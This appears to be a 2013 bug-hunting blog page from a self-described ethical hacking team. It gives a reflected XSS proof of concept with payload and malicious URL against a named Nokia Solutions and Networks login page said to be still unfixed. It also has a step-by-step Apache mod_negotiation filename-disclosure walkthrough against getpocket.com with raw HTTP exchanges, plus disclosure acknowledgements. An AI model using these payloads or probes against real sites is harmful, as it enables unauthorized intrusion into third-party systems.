2) Navigate to Web Mail Login on the top
and Insert your payload.
And hit Enter.
Geetz to ...KeralaCyberSquad-India...
www.Facebook.com/KeralaCyberSquad
sherin.real1@gmail.com
"Kerala Cyber Squad-India" - Operating From Different States & Country... We are Ethical Hackers(WhiteHats),WebApplicationPentesters,Exploit Writers,Security Researchers... We are Computer Geeks ....
Tuesday, December 24, 2013
Reflected XSS on DotEasy WebHosting....
Geetz to ...KeralaCyberSquad-India...
www.Facebook.com/KeralaCyberSquad
sherin.real1@gmail.com
Monday, December 23, 2013
Nokia Solutions and Networks reflected XSS
Nokia Solutions and Networks reflected XSS
Hello Geeks ,
Here is the POC of a Reflected XSS that I have found on Nokia Solutions and Network's domain https://rctool.access.nsn.com
[+] Vulnerable URL = https://rctool.access.nsn.com
[+] Vulnerable parameter = err
[+] Payload used = <SCRIPT>+prompt("xssed by Praveen Nair");</SCRIPT>
[+] URL with malicious Payload= https://rctool.access.nsn.com/login.asp?login=false&err=<SCRIPT>+prompt("xssed by Praveen Nair");</SCRIPT>
[+] Reported
[+] Duplicated
[+] Still Unfixed
Praveen Nair
Kerala Cyber Squad - India
Sunday, December 22, 2013
Apache mod_negotiation filename bruteforcing ( file-name buster ) vulnerability with LIVE Example
Apache mod_negotiation filename bruteforcing ( file-name buster ) vulnerability with LIVE Example
Hey Ya Geeks ,,
Am Praveen Nair for Team Kerala Cyber Squad - India.
Today am going to share a less known File-Name bruteforcing ( File-name Buster ) Attack on Apache server , even though its risk level is low I found it interesting so thought of sharing it with you all, so lets go into it without wasting much time :)
[+] THINGS YOU GONNA NEED
#>> A TOOL TO INTERCEPT THE HEADER REQUEST AND RESPONSE ( LIKE BURP , LIVE HTTP HEADER .....ETC ETC )
#>> IMPORTANT THINGS >> GOOD EYES TO WATCH OUT FOR THE HOLES. :D
>> BRAIN TOO :p
[+] TARGET = Pocket's main-domain (i.e) http://getpocket.com/
[+] VULNERABILITY = Apache mod_negotiation filename bruteforcing vulnerability
#>> RISK :- INFORMATION DISCLOSURE ( LOW )
#>> WHAT ACTUALLY IS THIS ATTACK ??? \0_0/
The mod_negotiation is an Apache module responsible for selecting the document that best matches the clients capabilities, from one of several available documents. If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. This behavior can help an attacker to learn more about his target, for example, generate a list of base names, generate a list of interesting extensions, look for backup files and so on.
MultiViews is an Apache option which acts with the following rules:
If the server receives a request for /some/dir/foo, if /some/dir has MultiViews enabled, and /some/dir/foo does not exist, then the server reads the directory looking for files named foo.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client had asked for one of them by name. It then chooses the best match to the client's requirements.
#>> HOW TO ATTACK / VERIFICATION AND RE-GENERATION ?? :N
It depends on several Accept* headers in the client Request.
Accept
Accept-Language
Accept-Encoding
SO, Let's see how it actually works:
Turn on the INTERCEPTOR tool an stay connected.
The case is, Suppose If an attacker requests "index" without any extension through a HTTP Header Request :
All he have to do is just use http://site.com/index in the address bar and press enter (as here we have the target as http://getpocket.com/ ) lets see what have we got in the request header.
#>> HTTP Header Request :-
GET http://getpocket.com/index HTTP/1.1
Host: getpocket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
and here focus on the Parameter" Accept" with value "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" and as here we want */* value of Accept parameter request we use a "Accept:" header with an existent mime type ( */* ).
#>> HTTP Header Response :-
HTTP/1.1 200 OK
Content-Location: index.php
Content-Type: text/html; charset=UTF-8
Date: Fri, 04 Oct 2013 18:10:48 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa OUR IND UNI COM NAV INT STA PRE"
Server: Apache
Set-Cookie: sess_guid=by5A1g73dR504Tb2fup4e11phRT8d332f40B54F617tjt7a56416dma8rd7WU171; expires=Sat, 30-Sep-2028 18:10:48 GMT; path=/; domain=getpocket.com
Set-Cookie: sess_start_time=1380910248; path=/; domain=.getpocket.com
TCN: choice
Vary: negotiate
x-frame-options: SAMEORIGIN
Transfer-Encoding: chunked
Connection: keep-alive
Now, it could be noticed that in the server response several interesting headers are out:
Content-Location: index.php
Vary: negotiate
TCN: choice
This means there is MultiViews enabled on / directory as it automatically selects the file index.php .
Let's see if in the request we use a "Accept:" header with an inexistent mime type ( test/hell ):
#>> HTTP Header Request :-
GET http://getpocket.com/index HTTP/1.1
Host: getpocket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9;q=0.8
Accept: test/hell
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
#>> HTTP Header Response :-
HTTP/1.1 406 Not Acceptable
Alternates: {"index.php" 1 {type text/html}}
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 04 Oct 2013 18:23:33 GMT
Server: Apache
TCN: list
Vary: negotiate
Content-Length: 410
Connection: keep-alive
#>> OUTPUT :-
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>
</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /index could not be found on this server.</p>
Available variants:
<ul>
<li><a href="index.php">index.php</a> , type text/html</li>
</ul>
<hr>
<address>Apache Server at getpocket.com Port 80</address>
</body></html>
woo! With a single request we get a listing of all the files! ;)
Well,yeah. Not really *all* the files but every file with the same name requested and with an extension listed in mime-types file.
This means that if index.whatever* is on the server it will be listed.
Similarly, The attacker can use any file name in place of "index" in this case so as a result can result in a filename bruteforcing with mod_negotiation an Apache module.
Hope This Tut was a lil bit informational to you all ,. :)
[+] This vulneability was reported to GetPocket Security Team, and as a result They rewarded me by adding my name in there Hall of Fame
Thanks for having a look at this post . :)
Please leave your comments below.
Praveen Nair ( c0d3 c0m4dr3 404 )
Team - Kerala Cyber Squad - India
./xit n 0ut
[+] VULNERABILITY = Apache mod_negotiation filename bruteforcing vulnerability
Let's see if in the request we use a "Accept:" header with an inexistent mime type ( test/hell ):
Team - Kerala Cyber Squad - India
./xit n 0ut
Friday, December 20, 2013
Got Listed on BitWall Security Researchers List
Got Listed on BitWall Security Researchers List
We are proud to make you aware about one more achievement by our Team - Kerala Cyber Squad - India's member ( Praveen Nair ) have Got listed in on BitWall Security Researchers List
http://www.bitwall.io/security
Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)
Got listed in Nokia Solutions and Networks's Responsible Disclosure list
Got listed in Nokia Solutions and Networks's Responsible Disclosure list
We are proud to make you aware about one more achievement by our Team - Kerala Cyber Squad - India have Got listed in Nokia Solutions and Networks's Responsible Disclosure list
http://nsn.com/responsible-disclosure
Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)
http://nsn.com/responsible-disclosure
Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)
Got listed in Androidfreeapp.net's Security Researcher list
Got listed in Androidfreeapp.net's Security Researcher list
We are proud to make you aware about one more achievement by our Team - Kerala Cyber Squad - India have Got listed in Androidfreeapp.net's Security Researchers list
http://www.androidfreeapp.net/security-researcher-acknowledgments/
Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. :)
Got Listed on Telekom Security Aknowledegment List ( Second Time )
Got Listed on Telekom Security Aknowledegment List ( Second Time )
We are proud to make you aware about one more achivement by our Team - Kerala Cyber Squad - India's member( Praveen Nair with his mate Simone Memoli ) have Got Listed on Telekom Security Aknowledegment List
This is the second time Achivement by Kerala Cyber Squad India on Telekom.
http://www.telekom.com/security/acknowledgements
Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)
Got Listed in MailChimp Security Incident Response Team List
Got Listed in MailChimp Security Incident Response Team List
We are proud to make you aware about one more achivement by our Team - Kerala Cyber Squad - India's member ( Praveen Nair ) Got Listed in MailChimp Security Incident Response Team List
http://mailchimp.com/about/security-response/
Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)
http://mailchimp.com/about/security-response/
Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)
Thursday, December 19, 2013
Rackspace #Content_Spoofing Vulnerability..!!! (KeralaCyberSquad-India)
Rackspace #Content_Spoofing Vulnerability..!!! (KeralaCyberSquad-India)
Rackspace #Content_Spoofing Vulnerability...!!!
POC Reported by Swapnil Thaware....
Special thanks to Swapnil Thaware....
Sherin Panikar (KeralaCyberSquad-India)
Wednesday, December 18, 2013
Vulnerabilities @ Dropbox.
Vulnerability @ DropBox
Unsecure upload that can lead to xss and other vulnerabilities @ Dropbox.
(Watch in 360p or above for better quality)
Description:-
Status : Unfixed!
Reported : Dec 8,2013
Follow Up Reply : Dec 9,2013
Greetz to Evan Ricafort (Robinhood:0x00)
KeralaCyberSquad-India (Sherin Panikar aka HardNocks-HittnHard).
Saturday, December 14, 2013
LavaSoft Stored XSS
Hi Guys ,
Here is the POC for Stored XSS found on Lavasoft .
Reported On - 7th Dec. 2013
Got no reply and its fixed now .. :/
XSS on CV Maker's site
HI Guys ,
Today , Am going to present you a Stored XSS on CV Maker's Official website
( http://cvmkr.com/ )
Step 1 :
Go to https://cvmkr.com/CV/new
Step 2 :
Step 3 :
Step 5 :
Today , Am going to present you a Stored XSS on CV Maker's Official website
( http://cvmkr.com/ )
Step 1 :
Go to https://cvmkr.com/CV/new
Step 2 :
Step 3 :
Step 4 :
Step 5 :
[+] Reported
[+] Acknowledged With a Certificate :)
Credits to : Praveen Nair
Greets: To all Members and Supporters of Kerala Cyber Squad -India and all Bug Hunters
Got listed in Pinoy Hack New's Responsible Disclosure List ( TWICE )
We are Proud to make you aware of Another Achievement by Team Kerala Cyber Squad - India
Kerala Cyber Squad - India got listed in Pinoy Hack News' Responsible Disclosure List ( Twice )
http://www.pinoyhacknews.com/security
Kerala Cyber Squad - India got listed in Pinoy Hack News' Responsible Disclosure List ( Twice )
http://www.pinoyhacknews.com/security
Credits to : Praveen Nair , Sherin Panikar
Greets: To all Members and Supporters of Kerala Cyber Squad -India and all Bug Hunters
Tuesday, December 10, 2013
Got listed in Magix Security Acknowledgments List ( Twice )
We are Proud to make you aware of Another Achievement by Team Kerala Cyber Squad - India
Kerala Cyber Squad - India got listed in Magix's Security Acknowledgments List ( Twice )
http://research.magix.com/
http://research.magix.com/
Credits to : Praveen Nair , Sherin Panikar
Greets: To all Members and Supporters of Kerala Cyber Squad -India and all Bug Hunters
Subscribe to:
Posts (Atom)